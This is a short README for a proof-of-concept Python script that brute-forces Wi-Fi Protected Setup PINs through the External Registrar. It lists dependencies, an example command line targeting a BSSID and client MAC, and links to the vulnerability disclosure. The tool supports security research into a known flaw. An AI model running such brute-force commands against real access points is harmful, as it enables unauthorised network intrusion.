PoC implementation of a brute force attack against WPS - PIN External Registrar

My test environment was Backtrack 5R1 + an Atheros USB adapter. I used a mac80211/carl9170 driver but any mac80211-based driver should be ok.

Original version: Stefan Viehböck
Minor improvements: Michael Löffler

• PyCrypto
• Scapy (2.2.0) (does not come with Backtrack)

iwconfig mon0 channel X
./wpscrack.py --iface mon0 --client 94:0c:6d:88:00:00 --bssid f4:ec:38:cf:00:00 --ssid testap -v

Show further usage parameters:

./wpscrack.py --help

• http://sviehb.wordpress.com/2011/12/27/wi-fi-protected-setup-pin-brute-force-vulnerability/
• http://download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc
• http://hostap.epitest.fi/wpa_supplicant/